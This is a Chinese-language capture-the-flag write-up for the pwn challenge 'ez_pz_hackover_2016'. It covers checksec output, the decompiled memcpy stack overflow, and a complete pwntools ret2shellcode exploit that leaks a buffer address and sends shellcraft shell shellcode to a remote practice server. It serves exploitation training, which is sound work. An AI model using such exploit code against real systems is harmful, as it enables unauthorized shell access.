【ez_pz_hackover_2016】WriteUp
checksec
发现NX保护未开启,因此可以考虑Ret2Shellcode。
[*] '/home/bronya/Documents/CTF/pwn17/ez_pz_hackover_2016'
Arch: i386-32-little
RELRO: Full RELRO
Stack: No canary found
NX: NX unknown - GNU_STACK missing
PIE: No PIE (0x8048000)
Stack: Executable
RWX: Has RWX segments
ida查看,发现存在栈溢出漏洞,其中n=0x400,因此可以尝试向dest中写入shellcode。
void *__cdecl vuln(int src, size_t n)
{
char dest[50]; // [esp+6h] [ebp-32h] BYREF
return memcpy(dest, &src, n);
}
构造exp:
from pwn import *
context(arch='i386', log_level='debug')
# p = process('./ez_pz_hackover_2016')
# gdb.attach(p, 'b *0x0804865D')
p = remote('node4.buuoj.cn', 26972)
elf = ELF('./ez_pz_hackover_2016')
printf_got = elf.got['printf']
printf_plt = elf.plt['printf']
shellcode = asm(shellcraft.sh())#生成shellcode,asm函数是进行汇编
p.recvuntil(b'Yippie, lets crash: 0x')
buf_addr = int(p.recv(8), 16) - 0x1c
print(hex(buf_addr))
shellcode_addr = buf_addr
payload = flat(b'crashme\x00', b'a'*(0x16-8), 0x0, shellcode_addr, shellcode)
p.sendlineafter(b'>', payload)
p.interactive()